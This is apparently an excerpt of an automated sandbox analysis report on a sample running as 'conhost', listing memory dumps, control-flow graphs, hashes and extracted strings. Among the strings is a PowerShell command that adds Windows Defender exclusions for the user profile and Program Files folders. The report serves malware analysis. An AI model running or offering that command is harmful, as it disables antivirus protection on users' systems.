                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: signal
                                                                                                                                                              • String ID: CCG
                                                                                                                                                              • API String ID: 1946981877-1584390748
                                                                                                                                                              • Opcode ID: 6876174941ad4ec12815e2c7e3bb31e6968b41551a664edfa185aefccb2c1aa8
                                                                                                                                                              • Instruction ID: 3f943d0eda2b93d2e315e2ab79f2f3906678a900fee34f26676af9c61d946822
                                                                                                                                                              • Opcode Fuzzy Hash: 6876174941ad4ec12815e2c7e3bb31e6968b41551a664edfa185aefccb2c1aa8
                                                                                                                                                              • Instruction Fuzzy Hash: 28416153E29102C5FB7825694C5837810955F8E724F2C8635D62DD73FECDAEA899430B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 362 7ff6eb431eb0-7ff6eb431f26 call 7ff6eb4466a0 365 7ff6eb431f28-7ff6eb431f4e memcpy call 7ff6eb4314f0 362->365 366 7ff6eb431f53-7ff6eb431f5a 362->366 365->366 368 7ff6eb43209d-7ff6eb4320cb wcslen memcpy 366->368 369 7ff6eb431f60-7ff6eb432096 366->369 370 7ff6eb4320f8-7ff6eb4320ff 368->370 371 7ff6eb4320cd-7ff6eb4320f3 memcpy call 7ff6eb4314f0 368->371 369->368 373 7ff6eb432105-7ff6eb43223b 370->373 374 7ff6eb432242-7ff6eb432288 370->374 371->370 373->374 375 7ff6eb43228a-7ff6eb4322da call 7ff6eb4314f0 374->375 376 7ff6eb4322df-7ff6eb4322e6 374->376 375->376 377 7ff6eb4322e8-7ff6eb432344 376->377 378 7ff6eb43234c-7ff6eb432385 wcslen 376->378 377->378 380 7ff6eb432387-7ff6eb4323d5 call 7ff6eb4314f0 378->380 381 7ff6eb4323da-7ff6eb4323e1 378->381 380->381 383 7ff6eb432447-7ff6eb4324b3 call 7ff6eb434106 381->383 384 7ff6eb4323e3-7ff6eb43243f 381->384 387 7ff6eb432939 383->387 388 7ff6eb4324b9-7ff6eb4324fa 383->388 384->383 389 7ff6eb43293b-7ff6eb432979 387->389 390 7ff6eb432503-7ff6eb432527 call 7ff6eb434115 388->390 393 7ff6eb43252d-7ff6eb432599 call 7ff6eb434106 390->393 394 7ff6eb43292f-7ff6eb432934 call 7ff6eb433fe9 390->394 398 7ff6eb432500 393->398 399 7ff6eb43259f-7ff6eb4325c6 call 7ff6eb434133 393->399 394->387 398->390 402 7ff6eb4325cc-7ff6eb4325de 399->402 403 7ff6eb432920-7ff6eb43292a call 7ff6eb433fe9 399->403 404 7ff6eb432620-7ff6eb432627 402->404 405 7ff6eb4325e0-7ff6eb43261b call 7ff6eb4314f0 402->405 403->398 408 7ff6eb432629-7ff6eb43268e 404->408 409 7ff6eb432696-7ff6eb4326ad _wcsnicmp 404->409 405->404 408->409 411 7ff6eb43297a-7ff6eb432993 call 7ff6eb433fe9 * 2 409->411 412 7ff6eb4326b3-7ff6eb4326ba 409->412 411->389 414 7ff6eb4326bc-7ff6eb4326df call 7ff6eb4314f0 412->414 415 7ff6eb4326e4-7ff6eb4326eb 412->415 414->415 418 7ff6eb43271c-7ff6eb432733 _wcsnicmp 415->418 419 7ff6eb4326ed-7ff6eb432714 415->419 418->411 420 7ff6eb432739-7ff6eb432740 418->420 419->418 422 7ff6eb43276a-7ff6eb432771 420->422 423 7ff6eb432742-7ff6eb432765 call 7ff6eb4314f0 420->423 426 7ff6eb4327a2-7ff6eb4327b9 _wcsnicmp 422->426 427 7ff6eb432773-7ff6eb43279a 422->427 423->422 426->411 428 7ff6eb4327bf-7ff6eb4327f4 426->428 427->426 429 7ff6eb4327f6-7ff6eb43285f call 7ff6eb4314f0 428->429 430 7ff6eb432864-7ff6eb43286b 428->430 429->430 432 7ff6eb43290c-7ff6eb43291e wcsstr 430->432 433 7ff6eb432871-7ff6eb432904 430->433 432->403 432->411 433->432
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$wcslen
                                                                                                                                                              • String ID: $0'$0$@$AMD$ATI$Advanced Micro Devices$NVIDIA$PROGRAMFILES=$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                                                                                                                                              • API String ID: 1844840824-1551673046
                                                                                                                                                              • Opcode ID: d99a732c2a3e7007cd77da4755ffa5225d60b89d39819dd4311c1d68ce849dda
                                                                                                                                                              • Instruction ID: 4b08029d4179bab525908b2c7d4045ce83fb2ca9960713aa4624bd5e4485182f
                                                                                                                                                              • Opcode Fuzzy Hash: d99a732c2a3e7007cd77da4755ffa5225d60b89d39819dd4311c1d68ce849dda
                                                                                                                                                              • Instruction Fuzzy Hash: AA524F22D2DE86D5F7129B29B4413B57360AF99384F045231D98C9A27DEF6FA18DC30E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 434 7ff6eb43ee60-7ff6eb43ee75 435 7ff6eb43ee77-7ff6eb43ee83 malloc 434->435 436 7ff6eb43eeb0-7ff6eb43eebd malloc 434->436 438 7ff6eb43eef2-7ff6eb43ef31 abort CreateSemaphoreW TlsAlloc 435->438 439 7ff6eb43ee85-7ff6eb43ee96 435->439 437 7ff6eb43eebf-7ff6eb43eed8 436->437 436->438 440 7ff6eb43ee98-7ff6eb43eead memcpy 437->440 441 7ff6eb43eeda-7ff6eb43eef1 memset 437->441 443 7ff6eb43ef50-7ff6eb43ef56 GetLastError 438->443 444 7ff6eb43ef33-7ff6eb43ef42 call 7ff6eb446800 438->444 439->440 439->441 446 7ff6eb43ef47-7ff6eb43ef49 443->446 444->446 447 7ff6eb43ef58-7ff6eb43ef7c abort 446->447 448 7ff6eb43ef4b-7ff6eb43ef4f 446->448 449 7ff6eb43ef98-7ff6eb43ef9f 447->449 450 7ff6eb43ef7e-7ff6eb43ef85 447->450 453 7ff6eb43efa1-7ff6eb43efc9 GetLastError TlsGetValue SetLastError 449->453 454 7ff6eb43f010-7ff6eb43f016 449->454 451 7ff6eb43ef87-7ff6eb43ef93 450->451 452 7ff6eb43f000-7ff6eb43f009 call 7ff6eb43ee60 450->452 452->451 455 7ff6eb43f080-7ff6eb43f09a calloc 453->455 456 7ff6eb43efcf-7ff6eb43efd5 453->456 458 7ff6eb43f01c-7ff6eb43f026 454->458 459 7ff6eb43f12a-7ff6eb43f131 454->459 460 7ff6eb43f0a0 455->460 461 7ff6eb43f1b3-7ff6eb43f1c3 abort 455->461 462 7ff6eb43f0c8-7ff6eb43f0ef realloc 456->462 463 7ff6eb43efdb-7ff6eb43efe7 456->463 465 7ff6eb43f158-7ff6eb43f160 458->465 466 7ff6eb43f02c-7ff6eb43f034 458->466 459->453 467 7ff6eb43f137-7ff6eb43f14d 459->467 468 7ff6eb43f0a3-7ff6eb43f0b4 TlsSetValue 460->468 470 7ff6eb43f1d0-7ff6eb43f1d4 461->470 471 7ff6eb43f1c5-7ff6eb43f1c8 461->471 462->461 472 7ff6eb43f0f5-7ff6eb43f10f memset 462->472 463->451 469 7ff6eb43efe9-7ff6eb43eff6 call 7ff6eb43ee60 463->469 475 7ff6eb43f111-7ff6eb43f116 call 7ff6eb43ef00 465->475 476 7ff6eb43f162-7ff6eb43f17a 465->476 473 7ff6eb43f18c-7ff6eb43f1a0 WaitForSingleObject 466->473 474 7ff6eb43f03a-7ff6eb43f041 466->474 468->463 478 7ff6eb43f0ba-7ff6eb43f0bd GetLastError 468->478 469->451 480 7ff6eb43f1d6 470->480 481 7ff6eb43f1da-7ff6eb43f1dd 470->481 471->470 472->468 473->474 477 7ff6eb43f1a6-7ff6eb43f1ae 473->477 474->467 483 7ff6eb43f047-7ff6eb43f04b 474->483 485 7ff6eb43f120-7ff6eb43f124 475->485 484 7ff6eb43f17c 476->484 476->485 477->474 478->463 480->481 487 7ff6eb43f1df-7ff6eb43f1e2 481->487 488 7ff6eb43f1e4 481->488 483->453 490 7ff6eb43f051-7ff6eb43f059 483->490 491 7ff6eb43f180-7ff6eb43f188 Sleep 484->491 485->459 485->466 487->488 492 7ff6eb43f1e8-7ff6eb43f1ec 487->492 490->453 493 7ff6eb43f05f-7ff6eb43f074 ReleaseSemaphore 490->493 491->491 494 7ff6eb43f18a 491->494 493->453 494->485
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 342303811-0
                                                                                                                                                              • Opcode ID: fa805e2e043a57f1a4382e6835309b82e00402617c77c5849f89fd4ba56e01b2
                                                                                                                                                              • Instruction ID: 855055335c4aad8f2dc5dd08e2b1a5d0dbcb2857b875db6e7f881774720e4373
                                                                                                                                                              • Opcode Fuzzy Hash: fa805e2e043a57f1a4382e6835309b82e00402617c77c5849f89fd4ba56e01b2
                                                                                                                                                              • Instruction Fuzzy Hash: 68918233A0A602D5EA54AF55F80877922A1AF5CB84F584135DD4D873BCDF3EE85AC30A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
                                                                                                                                                              • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                                                                                                                                              • API String ID: 802779101-808685626
                                                                                                                                                              • Opcode ID: 45f9f7f635192745baf892d2912285d2392f706606ddb2a48e73b66195d1f404
                                                                                                                                                              • Instruction ID: 15cf60ff800218d17893ad6bebc0b2dafae2138ae4e10b90ed2f2121a0ce5c58
                                                                                                                                                              • Opcode Fuzzy Hash: 45f9f7f635192745baf892d2912285d2392f706606ddb2a48e73b66195d1f404
                                                                                                                                                              • Instruction Fuzzy Hash: C1419C12B0911286FB10BFB1A8157B916519F8EB80F44403AD90D977EBDD2FE92B870B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionRaiseUnwindabort
                                                                                                                                                              • String ID: CCG $CCG!$CCG!$CCG"
                                                                                                                                                              • API String ID: 4140830120-3707373406
                                                                                                                                                              • Opcode ID: a3529a06544cebd43370817810ae69c06a1e571193dfec8cfc19c397a4d2ad1e
                                                                                                                                                              • Instruction ID: 5311cb1c574ebe7a4bb3334338c3b51ef46c43a9079437bfb817015990621adc
                                                                                                                                                              • Opcode Fuzzy Hash: a3529a06544cebd43370817810ae69c06a1e571193dfec8cfc19c397a4d2ad1e
                                                                                                                                                              • Instruction Fuzzy Hash: 9A51BD33A09A81C2E7608B19F4487AA7370FB99B94F544236EE8D53768CF3AD585C709
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 554 7ff6eb43c300-7ff6eb43c32b 555 7ff6eb43c728-7ff6eb43c732 554->555 556 7ff6eb43c331-7ff6eb43c34b strncmp 554->556 555->556 559 7ff6eb43c738 555->559 557 7ff6eb43c6a6-7ff6eb43c6af 556->557 558 7ff6eb43c351-7ff6eb43c386 556->558 557->558 561 7ff6eb43c6b5-7ff6eb43c6c3 557->561 560 7ff6eb43c44b-7ff6eb43c4b5 strlen 558->560 559->558 562 7ff6eb43c73d 560->562 563 7ff6eb43c4bb-7ff6eb43c505 call 7ff6eb43e3f0 * 2 560->563 561->558 564 7ff6eb43c6c9-7ff6eb43c6cf 561->564 568 7ff6eb43c73f-7ff6eb43c752 562->568 573 7ff6eb43c50b-7ff6eb43c50e 563->573 574 7ff6eb43c390-7ff6eb43c393 563->574 565 7ff6eb43c6d9-7ff6eb43c6e0 564->565 566 7ff6eb43c6d1-7ff6eb43c6d3 564->566 565->558 569 7ff6eb43c6e6-7ff6eb43c6f3 565->569 566->558 566->565 569->558 577 7ff6eb43c437-7ff6eb43c43b 573->577 578 7ff6eb43c514-7ff6eb43c520 573->578 575 7ff6eb43c399-7ff6eb43c3a5 574->575 576 7ff6eb43c660-7ff6eb43c670 call 7ff6eb434e70 574->576 582 7ff6eb43c3a7-7ff6eb43c3ab 575->582 583 7ff6eb43c3b1-7ff6eb43c3c0 strlen 575->583 587 7ff6eb43c678-7ff6eb43c68a 576->587 579 7ff6eb43c441-7ff6eb43c448 577->579 580 7ff6eb43c753 577->580 578->577 584 7ff6eb43c526-7ff6eb43c538 578->584 579->560 585 7ff6eb43c755-7ff6eb43c758 580->585 582->583 582->587 588 7ff6eb43c3c6-7ff6eb43c3df 583->588 589 7ff6eb43c71c-7ff6eb43c720 583->589 590 7ff6eb43c70c-7ff6eb43c714 call 7ff6eb4371b0 584->590 591 7ff6eb43c53e-7ff6eb43c540 584->591 585->568 593 7ff6eb43c6f8-7ff6eb43c707 call 7ff6eb4371b0 587->593 594 7ff6eb43c68c-7ff6eb43c68e 587->594 588->589 595 7ff6eb43c3e5-7ff6eb43c401 588->595 589->555 590->589 591->590 596 7ff6eb43c546-7ff6eb43c561 call 7ff6eb437c20 591->596 600 7ff6eb43c405-7ff6eb43c426 call 7ff6eb434160 strlen 593->600 594->593 599 7ff6eb43c690-7ff6eb43c6a1 call 7ff6eb437c20 594->599 595->600 608 7ff6eb43c567-7ff6eb43c569 596->608 609 7ff6eb43c42a-7ff6eb43c42d 596->609 599->600 600->609 608->609 611 7ff6eb43c56f 608->611 609->577 610 7ff6eb43c42f-7ff6eb43c431 609->610 610->577 613 7ff6eb43c75a-7ff6eb43c7f0 call 7ff6eb4344e0 610->613 612 7ff6eb43c570-7ff6eb43c588 611->612 614 7ff6eb43c58e-7ff6eb43c591 612->614 615 7ff6eb43c8b4-7ff6eb43c8bb 612->615 624 7ff6eb43c7fc-7ff6eb43c8a3 call 7ff6eb43e3f0 * 2 call 7ff6eb43af40 613->624 625 7ff6eb43c7f2 613->625 614->615 619 7ff6eb43c597-7ff6eb43c599 614->619 617 7ff6eb43c8c1-7ff6eb43c8c4 615->617 618 7ff6eb43c59f-7ff6eb43c5a7 615->618 617->618 621 7ff6eb43c8ca-7ff6eb43c8d0 617->621 623 7ff6eb43c5b9-7ff6eb43c5d1 618->623 619->618 622 7ff6eb43c8a8-7ff6eb43c8af 619->622 626 7ff6eb43c5e0-7ff6eb43c5e2 621->626 622->609 627 7ff6eb43c5b0-7ff6eb43c5b5 623->627 628 7ff6eb43c5d3-7ff6eb43c5d5 623->628 624->585 625->624 632 7ff6eb43c61d-7ff6eb43c648 call 7ff6eb434260 call 7ff6eb434160 626->632 633 7ff6eb43c5e4-7ff6eb43c5ee 626->633 627->623 628->627 630 7ff6eb43c5d7 628->630 630->626 632->609 646 7ff6eb43c64e-7ff6eb43c651 632->646 633->632 635 7ff6eb43c5f0-7ff6eb43c602 633->635 635->626 639 7ff6eb43c604 635->639 642 7ff6eb43c608-7ff6eb43c617 639->642 642->642 645 7ff6eb43c619-7ff6eb43c61b 642->645 645->632 645->633 646->612
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: strlenstrncmp
                                                                                                                                                              • String ID: Z$Z$_$_$_$_GLOBAL_
                                                                                                                                                              • API String ID: 1310274236-662103887
                                                                                                                                                              • Opcode ID: a69b931b51665080fc1721cecb62a3bc337328209a6b0fe8bd687cd3b048f661
                                                                                                                                                              • Instruction ID: 230f35d941d21f825539f7d1e8f7057cc62fbc731bb9e5b1bbf647c35269aca9
                                                                                                                                                              • Opcode Fuzzy Hash: a69b931b51665080fc1721cecb62a3bc337328209a6b0fe8bd687cd3b048f661
                                                                                                                                                              • Instruction Fuzzy Hash: 70E1F373A08792C9F7208F3594087FD3BA1AB08758F484131DE5C9A7AADF3ED64A8745
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: QueryVirtual
                                                                                                                                                              • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                                                              • API String ID: 1804819252-1534286854
                                                                                                                                                              • Opcode ID: 88956ce89939d000d67cdc8f673eeeffce422bf18eb6756d626909256d4f2578
                                                                                                                                                              • Instruction ID: 687c9a463143f2857c85fad9eb46ca66714420fa68c152c30b218f805b0b84b4
                                                                                                                                                              • Opcode Fuzzy Hash: 88956ce89939d000d67cdc8f673eeeffce422bf18eb6756d626909256d4f2578
                                                                                                                                                              • Instruction Fuzzy Hash: 8C61DC33A09A02D6EA109F55E8443B977A0BB4CB94F484134DE5C977B8DF3EE599C309
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: fwprintf
                                                                                                                                                              • String ID: %*.*S$%-*.*S$%.*S
                                                                                                                                                              • API String ID: 968622242-2115465065
                                                                                                                                                              • Opcode ID: 832a17fc87ff0e15ae0bc2a97249034f62b04abca9fe126b68f3f48ac58e4fff
                                                                                                                                                              • Instruction ID: 615b49d3cb88f0efb4f95d88f9a694bea9339fd5acbd0b6ec64ca3bf4b0ff074
                                                                                                                                                              • Opcode Fuzzy Hash: 832a17fc87ff0e15ae0bc2a97249034f62b04abca9fe126b68f3f48ac58e4fff
                                                                                                                                                              • Instruction Fuzzy Hash: 7541DDB3B18542C6F7508E29D4007796AA19B89BD4F18C135DF4C876EDDE3EE41B870A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: %*.*s$%-*.*s$%.*s$%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                              • API String ID: 0-4000767721
                                                                                                                                                              • Opcode ID: 4bd7f888997f1428eafd362586e12aa8852761755f39c9c26afa5e9e84c0920f
                                                                                                                                                              • Instruction ID: 0ae9f22d071386b2a6bd7074083d1bab3d2ac70a13bc1082a2ddbf91035c46e5
                                                                                                                                                              • Opcode Fuzzy Hash: 4bd7f888997f1428eafd362586e12aa8852761755f39c9c26afa5e9e84c0920f
                                                                                                                                                              • Instruction Fuzzy Hash: 9241CAB3A08246C6E7509E25C4007797BA0EF48798F18C135CE4D866EDDE3EE42ACB16
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true
                                                                                                                                                              • Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
